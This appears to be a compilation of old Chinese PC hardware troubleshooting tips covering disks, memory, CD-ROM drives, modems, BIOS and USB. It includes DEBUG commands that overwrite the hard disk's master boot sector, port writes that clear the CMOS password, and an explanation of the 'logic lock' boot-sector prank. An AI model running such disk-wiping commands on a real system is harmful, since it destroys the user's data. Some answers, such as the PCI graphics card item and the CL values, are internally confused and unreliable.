    分区表损坏还有一种形式，这里我姑且称之为“分区映射”，具体的表现是出现一个和活动分区一样的分区。一样包括文件结构，内容，分区容量。假如在任意区对分区内容作了变动，都会在另一处体现出来，好像是映射的影子一样。我曾遇上过，6.4G的硬盘变成8.4G(映射了2G的C区)。这种问题特别尴尬，这问题不影响使用，不修复的话也不会有事，但要修复时，NORTON的DISKDOCTOR和PQMAGIC却都变成了睁眼瞎，对分区总容量和硬盘实际大小不一致视而不见，满口没问题的敷衍你。对付这问题，只有GHOST覆盖和用NORTON的拯救盘恢复分区表。

常见故障四：硬盘出现坏道

    这是个令人震惊，人见人怕的词。近来IBM口碑也因此江河日下。当你用系统Windows　系统自带的磁盘扫描程序SCANDISK扫描硬盘的时候，系统提示说硬盘可能有坏道，随后闪过一片恐怖的蓝色，一个个小黄方块慢慢的伸展开，然后，在某个方块上被标上一个“B”……

    其实，这些坏道大多是逻辑坏道，是可以修复的。根本用不着送修（据说厂商之所以开发自检工具就是因为受不了返修的硬盘中的一半根本就是好的这一“残酷的”事实）。

    那么，当出现这样的问题的时候，我们应该怎样处理呢？

    一旦用“SCANDISK”扫描硬盘时如果程序提示有了坏道，首先我们应该重新使用各品牌硬盘自己的自检程序进行完全扫描。注意，别选快速扫描，因为它只能查出大约90%的问题。为了让自己放心，在这多花些时间是值得的。

    如果检查的结果是“成功修复”，那可以确定是逻辑坏道，可以拍拍胸脯喘口气了；假如不是，那就没有什么修复的可能了，如果你的硬盘还在保质期，那赶快那去更换吧。

    由于逻辑坏道只是将簇号作了标记，以后不再分配给文件使用。如果是逻辑坏道，只要将硬盘重新格式化就可以了。但为了防止格式化可能的丢弃现象（因为簇号上已经作了标记表明是坏簇，格式化程序可能没有检查就接受了这个“现实”，于是丢弃该簇），最好还是重分区，使用如IBM DM之类的软件还是相当快的，或者GHOST覆盖也可以，只是这两个方案都多多少少会损失些数据。

常见故障五：硬盘容量与标称值明显不符

    一般来说，硬盘格式化后容量会小于标称值，但此差距绝不会超过20％，如果两者差距很大，则应该在开机时进入BIOS设置。在其中根据你的硬盘作合理设置。如果还不行，则说明可能是你的主板不支持大容量硬盘，此时可以尝试下载最新的主板BIOS并进行刷新来解决。此种故障多在大容量硬盘与较老的主板搭配时出现。另外，由于突然断电等原因使BIOS设置产生混乱也可能导致这种故障的发生。

常见故障六：无论使用什么设备都不能正常引导系统

    这种故障一般是由于硬盘被病毒的“逻辑锁”锁住造成的，“硬盘逻辑锁”是一种很常见的恶作剧手段。中了逻辑锁之后，无论使用什么设备都不能正常引导系统，甚至是软盘、光驱、挂双硬盘都一样没有任何作用。

    “逻辑锁”的上锁原理：计算机在引导DOS系统时将会搜索所有逻辑盘的顺序，当DOS被引导时，首先要去找主引导扇区的分区表信息，然后查找各扩展分区的逻辑盘。“逻辑锁”修改了正常的主引导分区记录，将扩展分区的第一个逻辑盘指向自己，使得DOS在启动时查找到第一个逻辑盘后，查找下个逻辑盘总是找到自己，这样一来就形成了死循环。

    给“逻辑锁”解锁比较容易的方法是“热拔插”硬盘电源。就是在当系统启动时，先不给被锁的硬盘加
电，启动完成后再给硬盘“热插”上电源线，这样系统就可以正常控制硬盘了。这是一种非常危险的方法，为了降低危险程度，碰到“逻辑锁”后，大家最好依照下面几种比较简单和安全的方法处理。

    1. 首先准备一张启动盘，然后在其他正常的机器上使用二进制编辑工具（推荐UltraEdit）修改软盘上的IO.SYS文件（修改前记住先将该文件的属性改为正常），具体是在这个文件里面搜索第一个“55AA”字符串，找到以后修改为任何其他数值即可。用这张修改过的系统软盘你就可以顺利地带着被锁的硬盘启动了。不过这时由于该硬盘正常的分区表已经被破坏，你无法用“Fdisk”来删除和修改分区，这时你可以用Diskman等软件恢复或重建分区即可。

    2. 因为DM是不依赖于主板BIOS来识别硬盘的硬盘工具，就算在主板BIOS中将硬盘设为“NONE”，DM也可识别硬盘并进行分区和格式化等操作，所以我们也可以利用DM软件为硬盘解锁。

    首先将DM拷到一张系统盘上，接上被锁硬盘后开机，按“Del”键进入BIOS设置，将所有IDE接口设为
“NONE”并保存后退出，然后用软盘启动系统，系统即可“带锁”启动，因为此时系统根本就等于没有硬盘。启动后运行DM，你会发现DM可以识别出硬盘，选中该硬盘进行分区格式化就可以了。这种方法简单方便，但是有一个致命的缺点，就是硬盘上的数据保不住了

常见故障七：开机时硬盘无法自举，系统不认硬盘

    这种故障往往是最令人感到可怕的。产生这种故障的主要原因是硬盘主引导扇区数据被破坏，表现为硬盘主引导标志或分区标志丢失。这种故障的罪魁祸首往往是病毒，它将错误的数据覆盖到了主引导扇区中。市面上一些常见的杀毒软件都提供了修复硬盘的功能，大家不妨一试。但若手边无此类工具盘，则可尝试将全0数据写入主引导扇区，然后重新分区和格式化，其方法如下：用一张干净的DOS启动盘启动计算机，进入A:\>后输入以下命令（括号内为注释）：
    A:\>DEBUG（进入DEBUG程序）
    －F 100 3FF0（将数据区的内容清为0）
    －A 400（增加下面的命令）
    MOV AX,0301
    MOV BX,0100
    MOV CX,0001
    MOV DX,0080
    INT 13
    INT 03
    －G=400（执行对磁盘进行操作的命令）
    －Q（退DEBUG程序）

    用这种方法一般能使你的硬盘复活，但由于要重新分区和格式化，里面的数据可就难保了。以上是硬盘在日常使用中的一些常见故障及解决方法，希望能对大家有所启发。如果硬盘的故障相当严重并不能用上述的一些方法处理时，则很可能是机械故障。由于硬盘的结构相当复杂，所以不建议用户自己拆卸，而应求助于专业人员予以维修

内存

    内存是电脑中最重要的配件之一，它的作用毋庸置疑，那么内存最常见的故障都有哪些呢？

常见故障一：开机无显示

    内存条原因出现此类故障一般是因为内存条与主板内存插槽接触不良造成，只要用橡皮擦来回擦试其金手指部位即可解决问题（不要用酒精等清洗），还有就是内存损坏或主板内存槽有问题也会造成此类故障。
    由于内存条原因造成开机无显示故障，主机扬声器一般都会长时间蜂鸣（针对Award Bios而言）。

常见故障二：Windows注册表经常无故损坏，提示要求用户恢复

    此类故障一般都是因为内存条质量不佳引起，很难予以修复，唯有更换一途。

常见故障三：Windows经常自动进入安全模式

    此类故障一般是由于主板与内存条不兼容或内存条质量不佳引起，常见于高频率的内存用于某些不支持此频率内存条的主板上，可以尝试在CMOS设置内降低内存读取速度看能否解决问题，如若不行，那就只有更换内存条了。

常见故障四：随机性死机

    此类故障一般是由于采用了几种不同芯片的内存条，由于各内存条速度不同产生一个时间差从而导致死
机，对此可以在CMOS设置内降低内存速度予以解决，否则，唯有使用同型号内存。还有一种可能就是内存条与主板不兼容，此类现象一般少见，另外也有可能是内存条与主板接触不良引起电脑随机性死机。01

常见故障五：内存加大后系统资源反而降低

    此类现象一般是由于主板与内存不兼容引起，常见于高频率的内存内存条用于某些不支持此频率的内存条的主板上，当出现这样的故障后你可以试着在COMS中将内存的速度设置得低一点试试。

常见故障六：运行某些软件时经常出现内存不足的提示

    此现象一般是由于系统盘剩余空间不足造成，可以删除一些无用文件，多留一些空间即可，一般保持在
300M左右为宜。

常见故障七：从硬盘引导安装Windows进行到检测磁盘空间时，系统提示内存不足

    此类故障一般是由于用户在config.sys文件中加入了emm386.exe文件，只要将其屏蔽掉即可解决问题。

光驱
    光驱是电脑硬件中使用寿命最短的配件之一。其实很多报废的光驱仍有很大的利用价值，只要略微维修一下就可以了。这往往不需要具有什么高深的无线电专业知识，也不需要使用什么太复杂的维修工具及材料。你只要细心观察故障现象并参照执行下面的一些排除方法，相信你的老光驱还是能恢 复昔日“风采”的。

常见故障一：光驱工作时硬盘灯始终闪烁

    这是一种假象，实际上并非如此。硬盘灯闪烁是因为光驱与硬盘同接在一个IDE接口上，光盘工作时也控制了硬盘灯的结果。可将光驱单元独接在一个IDE接口上。

常见故障二：在Windows环境下对CD-ROM进行操作时显示 “32磁盘访问失败”，然后死机

    很显然，Windows的32位磁盘存取对CD-ROM有一定的影响。CD-ROM大部分接在硬盘的IDE接口上，不支持
Windows的32位磁盘存取功能，使Windows产生了内部错误而死机。进入Windows后，在“主群组”中双击“控制面板”，进入“386增强模式”设置，单击“虚拟内存”按钮后再单击“更改”，把左下角的“32位磁盘访问”核实框关闭，在确认后，再重启动Windows,在Windows中再访问CD-ROM进就不会出错误。

常见故障三：光驱无法正常读盘，屏幕上显示：“驱动器X上没有磁盘，插入磁盘再试”，或"CDR101:NOT
READY READING DRIVE X ABORT .RETRY.FALL?"偶尔进出盒几次也都读盘，但不久又不读盘。

    在此情况下，应先检测病毒，用杀毒软件进行对整机进行查杀毒，如果没有发现病毒可用文件编辑软件打开C盘根目录下的CONFIG.SYS”文件，查看其中是否又挂上光驱动程序及驱动程序是否被破坏，并进行处理，还可用文本编辑软件查看"AUIOEXEC.BAT"文件中是否有"MSCDEX.EXE/D:MSCDOOO /M:20/V".若以上两步未发现问题，可拆卸光驱维修。

常见故障四：光驱使用时出现读写错误或无盘提示

    这种现象大部分是在换盘时还没有就位就对光驱进行操作所引起的故障。对光驱的所有的操作都必需要等光盘指示灯显示为就好位时才可进行操作。在播放影碟时也应将时间调到零时再换盘，这样就可以避免出现上述错误。

常见故障五：在播放电影VCD时出现画面停顿或破碎现象

    检查一下AUTOEXEC.BAT文件中的“SMARTDRV”是否放在MSCDEX.EXE之后。若是，则应将SMARTDRV语句放
到MSCDEX.EXE之前；不使用光驱的高速党组地冲程序，改为SMARTDRV.EXE/U;故障即可排除。

常见故障六：光驱在读数据时，有时读得不出，并且读盘的时间变长

    光驱读盘不出的硬件故障主要集中在激光头组件上，且可分为二种情况：一种是使用太久造成激光管老
化；另一种是光电管表面太脏或激光管透镜太脏及位移变形。所以在对激光管功率进行调整时，还需对光电管和激光管透镜进行清洗。

    光电管及聚焦透镜的清洗方法是：拔掉连接激光头组件的一组扁平电缆，记住方向，拆开激光头组件。这时能看到护套罩着激光头聚焦透镜，去掉护套后会发现聚焦透镜由四根细铜丝连接到聚焦、寻迹线圈上，光电管组件安装在透镜正下方的小孔中。用细铁丝包上棉花沾少量蒸馏水擦拭（不可用酒精擦拭光电管和聚焦透镜表面），并看看透镜是否水平悬空正对激光管，否则须适当调整。至此，清洗工作完毕。

    调整激光头功率。在激光头组件的侧面有1个像十字螺钉的小电位器。用色笔记下其初始位置，一般先顺时针旋转5°～10°，装机试机不行再逆时针旋转5°～10°，直到能顺利读盘。注意切不可旋转太多，以免功率太大而烧毁光电管。

常见故障七：开机检测不到光驱或者检测失败

    这有可能是由于光驱数据线接头松动、硬盘数据线损毁或光驱跳线设置错误引起的，遇到这种问题的时
候，我们首先应该检查光驱的数据线接头是否松动，如果发现没有插好，就将其重新插好、插紧。如果这样仍然不能解决故障，那么我们可以找来一根新的数据线换上试试。这时候如果故障依然存在的话，我们就需要检查一下光盘的跳线设置了，如果有错误，将其更改即可

Modem
常见故障一：56K的Modem不能上到56K。这个问题可以从以下几方面考虑：

    1. 实际的56Kmodem最高速度只能达到53K左右，考虑各种影响，56Kmodem的速度一般在45-53K之间。
    2. 电话线路在很大程度上影响Modem的传输速度，如果电话线路质量不好、线路电压不稳，56K的Modem
就上不到56K；另外使用分机上网，也会影响上网速度。
    3. 未安装正确的驱动程序。
    4. 和ISP使用的协议不同，只有您的Modem和您的ISP协议相同时，Modem才会达到56K的标准。
    排除以上原因，您的56K Modem仍速度远远低于53K，这就是您的Modem硬件问题，可以考虑更换或送修
了。

常见故障二：Modem经常掉线，产生掉线问题可能有以下几种原因：

    1. 电话线路质量不好；
    2. 若数据终端就绪(DTR)信号无效持续的时间超过Modem默认设置值，就会引起掉线；
    3. 如果您的电话具有"呼叫等待"这一程控电话新功能，每当有电话打进来，调制解调器就会受到干扰而
断开；
    4. 另外，Modem本身的质量以及不同Modem间的兼容性问题也是引起Modem掉线的一个普遍存在的原因。

常见故障三：Modem无拨号音

    当在夜深人静的时候上网时，为了不使拨号音影响别人睡眠，可以通过适当的AT命令来改变：可以用ATM0设置Modem无拨号音，而ATM1设置Modem从拨号到连接时有拨号音。对于音量的选择您可以通过以下指令改变，ATL0(低音量)、ATL1(低音量)、ATL2(中音量)、ATL3(高音量)。

常见故障四：传真速率达不到14400

    Modem的最大传真速率是14400，而发传真时速率只有9600。这是因为大部分传真机的发送和接受速率都
是9600，只有使用速率是14400或是33600的传真机，Modem的传真速率才会达到14400。

常见故障五：Modem无法拨号或连接

    如果没有正确安装您的Modem，通信功能将无法正常工作。下列过程列出了验证Modem与Windows的通讯程序安装了不兼容的驱动程序文件，可能会导致COM端口和Modem工作不正常，所以应该首先检查是否加载了正确的Windows98文件。

    1. 检验现有的通讯文件
    (1) 将System目录中的COMM.DRV和SERIAL.VXD文件与Windows95软盘或光盘中的原版文件进行比较，检
查文件的大小和日期是否相同。
    (2) 确认在System.ini文件中有下列几行：[boot]Comm.drv=Comm.drv[386enh]device=*vcd
    (3) 在"控制面板"中运行"添加新硬件"向导，检测和安装Windows98驱动程序。注意：Windows98在
System.ini中不加载SERIAL.VXD驱动程序，而是使用注册命令来加载它。另外，在System.ini中也没有与
*VCD相关的文件。这些文件被内置于VMM32.VXD中。

    2. 检验调制解调器的配置
    在"控制面板"中，双击"调制解调器"图标。验证您的调制解调器的制造商和型号，运行"安装新调制解调
器"向导检测调制解调器并确认当前配置是否正确。如果您的调制解调器未出现在已安装的调制解调器列表
中，请单击"添加"，然后选择合适的调制解调器。如果制造商和类型不正确，并且在列表中没有您的设备制造商及类型，请试着用“通用调制解调器"中的"与Hayes兼容"选项，设置为调制解调器支持的最大波特率，并单击"确定"。在排除冲突列表中删除所有的调制解调器条目。

    3. 检查调制解调器是否处于可以使用状态
    在"控制面板"中双击"系统"图标，然后单击"设备管理"标签，在列表中选择您的调制解调器并单击"属
性"，确认是否选中"设备已存在，请使用"。

    4. 检查端口的正确性
    在"控制面板"中双击"调制解调器"图标，选择您的调制解调器，然后单击"属性"，在"通用"标签上，检验
列出的端口是否正确。如果不正确，请选择正确的端口，然后单击"确定"。

    5. 确认串口的I/O地址和IRQ设置是否正确
    在"控制面板"中双击"系统"图标，单击"设备管理"标签，再单击"端口"，选取一个端口，然后单击"属
性"，单击"资源"标签显示该端口的当前资源设置，请参阅调制解调器的手册以找到正确的设置，在"资源"对
话框中，检查"冲突设备列表"以查看调制解调器使用的资源是否与其它设备发生冲突，如果调制解调器与其它设备发生冲突，请单击"更改设置"，然后单击未产生资源冲突的配置。
    注意：如果COM1上有鼠标器或其它设备，请不要在COM3上使用调制解调器。通常COM1和COM3端口使用同
样的IRQ，并且在多数计算机上不能同时使用。COM2和COM4也有同样的问题。如果可能的话，请更改COM3和
COM4端口的IRQ设置，使它们不再冲突。另外，有一些显示卡的地址也和COM4端口冲突，如果发现冲突，请使用其它端口，或者更换您的图形适配器。

    6. 检验端口设置
    在"控制面板"上双击"调制解调器"图标，单击调制解调器，然后单击"属性"，在出现的菜单中单击"连
接"标签以便检查当前端口设置，例如波特率、数据位、停止位和校验。

7. 检验调制解调器波特率
    在"控制面板"中双击"调制解调器"，选择一种调制解调器，然后单击"属性"，单击"通用"标签，然后将波
特率设置为正确速率。
    注意：如果您呼叫的主系统在原先设置的波特率下无法通讯，那么有时降低波特率可能会解决问题。


硬件常见问题集锦（1）

《一键清理系统垃圾》

硬件常见问题集锦（1）

1,Q:怎样清除忘记的 CMOS 口令?

A:
(1)快速短接主版上 CMOS 供电电池附近的“Clear CMOS”跳线；
(2)如果机器能启动进入 DOS 或 Windows,可以试按照以下步骤清除 CMOS:
C:\>DEBUG
-o 70 11
-o 71 ff
-q
然后，启动机器。

2,Q:“老鼠”为什么“罢工”?
A:机械式鼠标是依靠其内部的机械电子装置产生的光栅信号判断鼠标的方向和速度的，所以，当外界的光源对鼠标内部的光信号产生影响时，鼠标就会变得“扭扭捏捏、迟滞凝涩”。所以鼠标不要在强光(如台灯、阳光)下使用。
另外，机械式鼠标使用日久，滚球沾染上灰尘污垢后，也会表现出使用不灵活的现象，这种情况更常见一些。这时需要对鼠标的滚轴和滚球进行清洗。

3,Q:IDE 硬盘和光驱的合理安装:
A:现在一般的主版都有两个 IDE 接口,第一硬盘(引导机器启动)应安装在 IDE1 口上,并将主/辅(Master/Slave)跳线跳在“Master”上。光驱尽量不与硬盘接在同一个 IDE 口上，故一般在 IDE2 口上安装光驱。如果IDE2口上只接有光驱，那么其主/辅(Master/Slave) 跳线可任意设置；如果还有硬盘或光驱，则它们的跳线设置必须不同。

4,Q:USB 接口应用指南：

A:Universal Serial Bus(通用串行总线)接口可以轻松地为 PC 添加设备，同时不占用电脑的并口和串口。从理论上说，只要将设备一插，就可以工作了。尽管 USB 是目前电脑与各种外设相连的最佳途径，但它并非完美无缺。

(1)、让电脑支持 USB：现在的大部分电脑带有 USB 端口。一些老式主板和机箱中也有 USB 连接器，但可能不起作用。所以一定要检查主板或电脑操作手册，以便查出怎样使 USB 工作。在老式电脑上，可以在启动时查看电脑的 BIOS，以确定它是否支持 USB。为了使 USB 键盘或鼠标在 DOS 状态下工作，应该选择 USB Legacy 支持选项(如果有该选项的话)。如果该主板不能接入 USB 设备，你就应该买一块 PCI 卡，以便将 USB 插槽添加到老式电脑中。

(2)、让 Windows 系统支持 USB：并非所有的 Windows 版本都支持 USB。Windows98 对很多外设都提供了全面的 USB 支持。Windows95 的零售版则不支持 USB，只有后来与 PC 捆绑销售的 Windows95 版本才支持 USB。你可以看看你的 Windows95 版本信息(可右击“我的电脑”图标并选择“属性”)，如果版本号是以 B 或者 C 结尾，则你的这个 Windows 95 只对有限范围的设备提供 USB 支持。如想查看你的电脑中是否安装了 USB 控制器，可进入“控制面板”，双击其中的“系统”图标，然后选择“设备管理器”选项卡。在该选项卡设备列表的底部，你会找到 Universal Serial Bus Controller(通用串口总线控制器)。点击该控制器，你会看到两个项目：Universal Host Controller 和 Universal Root Hub。如果还没安装相应的驱动程序，则可以从你的Windows 95 光盘的 \OTHER\USB 文件夹中找到这些项目。双击 Usbsupp.exe 即可安装 USB 驱动程序。Windows 3.X 及更早版本的 Windows 及 Windows NT 都不支持 USB。若想获得最佳的 USB 支持，则应将系统升级到 Windows 98 或 Windows 2000。

(3)、让电脑连接更多的 USB 设备：电脑一般只有两个 USB 端口，而且大多数(老式的) USB 插槽还都设置在电脑的后面板，用起来不太方便。2000 年新推出的一些电脑则把 USB 插槽放在了电脑的前面板。如果一个 USB 插槽能接受另一个兼容设备，那你就能连入更多的 USB 外设，一个可行的解决方案是利用 USB 集线器，该集线器可以提供多个 USB 端口，你只要将该集线器直接插入到你的电脑中即可。目前，一些显示器已经提供了一个 USB 集线器，这样，你就可以轻松地添加 USB 鼠标和 USB 游戏杆了。你还可以从 Belkin Components(网址：http://www.belkin.com)这类公司购买一个 USB 集线器。有了足够的 USB 端口，就有可能在一台电脑中最多连入 127 个 USB 设备。

(4)、USB音箱问题：USB 音箱能提供清晰的数字声音，但如果你喜欢播放音频 CD，就应该注意，许多电脑中的 CD-ROM 播放器并不支持将 CD 盘中的数字音频直接用音箱播放。因此，在购买 USB 音箱前，一定要看清CD-ROM 驱动器的兼容性。按要求装好了 USB 音箱后，即可进入到“控制面板”中，再进入多媒体属性(Multimedia Properties) 窗口，并选择新安装的 USB 音箱作为首选的音频回放设备。此外，应该选择 Enable Digital CD Audio for This CD-ROM Device(该 CD-ROM 设备可播放数字 CD 音频)选项。如果该选项没有出现或者变灰，那就说明你的 CD-ROM 驱动器不支持数字音频。

5,Q:什么是 USB(Universal Serial Bus 通用串行总线)接口?
A:USB 接口是微机主板上的一个四针接口,其中中间两个针传输数据,两边两个针给外设供电。现在采用 TX 芯片组的主板都支持 USB 接口。USB 接口速度快、连接简单、不需要外接电源，同时对外设有良好的兼容性。

  USB 接口可以连接音箱、调制解调器(Modem)、数码相机、显示器、游戏杆、扫描仪、鼠标、键盘等外围设备。这些外设可以进行热插拔。

  USB 接口可以像 Hub 一样通过 USB Hub 的 级联进行数量扩充，但级联数不能超过 3 个，否则会严重影响外设的供电电压，使外设不能工作，还有可能烧坏主板。
现在能够直接支持 USB 接口的操作系统有 Windows98、Windows Me、Windows2000 等。WindowsNT4.0 不支持 USB 接口。Windows95/97(Windows97即Windows95 OSR2)可以通过安装 USB 接口驱动程序来支持 USB 设备。安装 USB 设备时,某些主板需要将 BIOS 设置中的 USB 选项进行“Enable”设置。

6,Q: USB 设备安装后,为什么不能使用?
    A:首先看看 CMOS 设置中,USB 端口是否打开(Enable)；再就是要看你的操作系统是否支持 USB 设备，而且要安装 USB 的设备驱动程序。某些主板还要安装 USB 驱动程序。

7,Q:Windows98/98/NT/2000 对等网中网络共享打印机阻塞后怎么办?
A:有时连续向共享打印机发出打印命令,打印机毫无反应。这有可能是打印机发生了阻塞。处理办法是：(1)关掉打印机电源，数秒后再接通；(2)重新启动与共享打印机直接连接的计算机，机器会检测到有打印队列中有未完成的打印任务，问：“确定? 执行? 取消?” 这时我们应当取消所有的打印任务，将打印机的缓冲池清零，即可消除阻塞，恢复正常。

8,Q:如何使机器硬盘的传输实现 DMA66?
A:实现 DMA66 有四个前提条件:
(1)主板支持 DMA66 传输模式。在主板支持的情况下，你仍需要在 BIOS 的Integrated Peripherals子菜单中将 IDE Primary Master UDMA 设定为 Auto 模式。如果你的电脑在启动时显示 UDMA2，证明主板的支持功能已经开启了。

(2)硬盘支持 DMA66 模式。你可以查阅硬盘资料，确认它是否支持 DMA66。

(3)必须使用专用的 DMA66 数据线。DMA66 数据线是 80 芯，而普通的 IDE 硬盘数据线为 40 芯。

(4)安装 DMA66 驱动程序。一般可以在主板驱动程序盘中找到。

9,Q:为什么 Modem 上网的速度很低?
A:有时主机机箱外壳带电会使 Modem 的连接速度很低。请将机器外壳良好接地后试试。

10,Q:怎样正确使用 UPS?
A:
   (1)选购时要留有充足的功率余量,不要让 UPS 长期满负荷工作;
   (2)正确连接 UPS 输入的交流极性;
   (3)不要频繁开、关电源;
   (4)在 UPS 的输出端不宜带可控硅负载、可控硅桥式整流或半波整流式负载；
   (5)长期不停电的地区，UPS 2 至 3 个月人为放电一次；
   (6)不要让蓄电池深度放电(UPS 深度放电的次数只有 200 至 250 次左右)；
   (7)不要让 UPS 带打印机等感性负载；
   (8)新购的 UPS 要将蓄电池并联起来均横充电 12 至 24 小时；
   (9)长期不用的 UPS(停机 10 天以上)在重新启用时应浮充 10 至 12 小时使用；
   (10)若要使用交流稳压器，应接在 UPS 的前级；
   (11)开、关 UPS 的间断时间应大于 1 分钟；
   (12)UPS 不宜由柴油发电机供电，因为其频率经常突变不稳。

11,Q:不同规格的内存条能否混用:内存条的 CL=3 或 CL=3,有的支持 ECC,有的不支持ECC,它们能否混用?
A:可以。但它们必须执行相同的参数。因为有的内存条支持 ECC,有的不支持ECC，所以 BIOS 内的 ECC 功能是不能打开的。有因为它们的速度不同，所以 CL=2 的内存条就要将速度降下来与 CL=2 的内存条进行匹配，故而在 BIOS 内 CL 就要设定为 3。只要进行这样的设定就一般不会有问题了。

12,Q:什么是 AGP?
A:AGP(Accelerated Graphics Port) 是由 Intel 公司所制定的显示界面规格,速度由最初的 AGP1x(264Mbytes/sec) 到现在的 AGP4x(1Gbytes/sec)。因为 AGP 拥有高速频宽，受到众多显示芯片厂家的支持，他们推出支持 AGP4x 的不同产品，以满足用户对图像运算、高画质的要求。Intel 公司已经宣布了其最新的 AGP8x 规格，它依旧使用 32-bit 的构架，而速度则提升至 533MHz，支持 2GBytes/s，是 AGP4x 的两倍。AGP 显卡现在使用已经相当普遍，AGP 插槽在主板上为灰褐色。

13,Q:电脑为什么“黑屏”?
A:电脑黑屏的原因很多，常见的有：
(1)显示器断电，或显示器数据线接触不良；
(2)主板没有供电；
(3)显卡接触不良或损坏；
(4)CPU 接触不良；
(5)内存条接触不良；
(6)机器感染 CIH 病毒，BIOS 被破坏性刷新。

14,Q:PCI 显卡和 ISA 显卡有什么区别?
A:它们在外观上最明显的区别是，PCI 显卡比 ISA 显卡的插脚要少，在主板上，PCI 总线插槽也比 ISA 总线插槽要短(PCI 总线插槽是白颜色的，而 ISA 总线插槽是黑色的)。由于使用主板上不同的总线，所以 PCI 显卡占用 CPU 资源少一些，它的数据传输速度可以达到每秒 10M、100M，甚至 1000M。而 ISA 显卡一般是 10M 显卡。现在的许多 PCI 显卡做成 10M/100M 自适应网卡(如 D-link 530TX)，以提高其通用性。

15,Q:为什么我删除虚拟光驱后，原光驱不能用了?
    A:原因是删除虚拟光驱时将注册表中的 HKEY_LOCAL_MACHINE\Enum\SCSI 主键下的所有子键也删除了，从而删除了物理光驱和虚拟光驱的信息。但是由于光驱是 PnP 设备，在 Windows 重新启动后，这种问题会自动解决。

16,Q:K6-II 芯片是否有和 Win95 不兼容的现象?
A:根据 AMD 在其主页上的告示称，在基于 AMDk6-2 芯片的系统上启动 Windows95 OSR2、OSR2.1、OSR2.5时，当运行频率在 350M 以上时有可能出现下列三种错误之一：“设备IOS不能初始化，Windows保护错误”“必须重新启动计算机”“Windows保护错误，必须重新启动计算机”。当运行频率为 350M 时，以上问题只是偶尔出现。在更高的频率上运行时，出错的可能性加大。AMD 称这只是一个兼容性问题，而不是处理器出错。解决此问题的办法是到 AMD 的主页下载并安装相关的补丁程序。

17,Q:内存条对主板电压有什么要求?
A:SIMM 内存条的电压是 5V，DIMM 内存条的电压是有两种：3.3V 和 2.5V。主板提供的电压应当与内存条要求的电压一致，如果主板设置的电压为 2.5V，却安装了 5V 的内存条，则是不行的。主板上一般都提供跳线用来调整内存条的电压。

18,Q:怎样升级主板上的 BIOS?
A:要升级主板上的 BIOS，必须要有 BIOS 对应的烧写程序和新版本的 BIOS 数据文件。Award 和 AMI BIOS 芯片对应的烧写程序分别为 Awdflash 和 Amiflash，不要混用。新版本 BIOS 数据文件的数据文件一般以 BIN 为扩展名。必须注意的是，BIOS 文件一定要与主板的型号严格一致，也就是说即使是同一牌号的主板，只要型号不一致，其 BIOS 数据也不能通用，混用的后果是不堪设想的。烧写程序和新版 BIOS 数据文件可从 BIOS 的生产厂家的网站上去下载。升级步骤如下：

(1)准备工作：将 BIOS 的擦写开关置为 Enable(在主板上或 CMOS 中设置)；将机器设置为从软盘引导；升级用的数据软盘质量一定要好，不能在升级过程中出现读盘错误！最好给升级的机器配接 UPS，否则在升级过程中出现断电会损坏 BIOS，使机器瘫痪。

(2)启动机器进入 DOS 状态。升级 BIOS 必须在 DOS 模式下进行。最好是软盘启动进入纯 DOS 环境。

(3)升级。命令格式是：<烧写程序> ，如 A:\>Awdflash ODI32.BIN。升级前一定要选择保存旧版本 BIOS 的数据。升级一般需要十几秒钟。

(4)升级后如果机器能正常启动，说明升级正确。如果机器黑屏，不能启动，说明升级失败。

19,Q:为什么要升级主板上的 BIOS?
A:目前 BIOS 的生产厂家有 Award、AMI、Phoenix、MR 等。还有一些硬件 OEM 厂家为自有品牌生产的 BIOS，如 COMPAQ 等。目前市面上的 586 档次以上的主板的 BIOS 决大多数采用的是 Flash EPROM(闪速可擦可编程只读存储器)，可直接用软件改写升级。升级主板 BIOS 可以修正以前版本中的 Bug 并对新的硬件或技术规范提供支持，还可以解决 2000 年问题。

20,Q:如何判断主板上的 BIOS 是否可以升级?
A:最好是查看主板说明书，还可以咨询销售商。也可以察看主板上的 BIOS 芯片，如果它是一个 28 针或 32 针的双列直插式的集成电路，而且上面印有 BIOS 字样的话，该芯片大多为 Award 或 AMI 的产品。然后揭掉 BIOS 芯片上的纸质或金属标签，仔细观察一下芯片，你会发现上面有一串号码，如果号码中有 28 或 29 的数字，那么就可以证明该 BIOS 芯片是可以升级的。

21,Q:主板 BIOS 升级失败后怎么办?
A:
(1)用写入设备重写 BIOS。请商家进行。

(2)热拔插法。找一台与你的主板型号完全一致的主机，软盘引导至 DOS 状态后，拔下主板上的 BIOS 芯片，插入损坏的 BIOS 芯片，然后按照升级 BIOS 的方法进行，成功后即可恢复损坏的 BIOS 中的数据。

(3)更换 BIOS 芯片。但一般对应的 BIOS 芯片很难找到。

22,Q:局域网一般有几种传输介质，怎么分类?

A:一般有双绞线、同轴电缆和光缆。
双绞线分为屏蔽双绞线(STP)和非屏蔽双绞线(UTP)：STP 有 3 类、5 类和超 5 类几种，UTP 有 3 类、4 类、5 类和超 5 类等几种。3 类线用于语音传输及 10Mbps 的数据传输；4 类线语音传输和 16Mbps 的数据传输；5 类线用于语音传输及 100Mbps 的数据传输。双绞线每网段 100 米，接 4 个中继器后最长可达到 500 米。每干线最大节点数无限制。
    同轴电缆一般分粗缆和细缆俩种。粗缆造价高、安装难度大、标准距离长、可靠性高，可用于大型局域网的主干部分。粗缆每段 500 米，最长网络范围可达 2500 米，收发器间最小 2.5 米，收发器电缆最长 50 米，每干线最大节点数 100 个。细缆造价低、安装方便、可靠性差、抗干扰能力强，用于局域网的主干连接，每段最长 185 米，最长网络范围可达 925 米，两 T 形头间最小 0.5 米，每干线最大节点数 30 个。

    光缆分传输点模数类(又分单模光纤和多模光纤两类)和折射率分布类(又分跳变式光纤和渐变式光纤两类)。光缆的主要特点是，传输频带宽，通信容量大，传输距离远，抗干扰能力强，抗化学腐蚀能力强。光缆主要用于长距离传输信号，局域网主干部分，传输宽带信号。光缆的网络距离为 2000 米，每干线最大节点数无限制。

23,Q:什么是“硬猫”“软猫”?
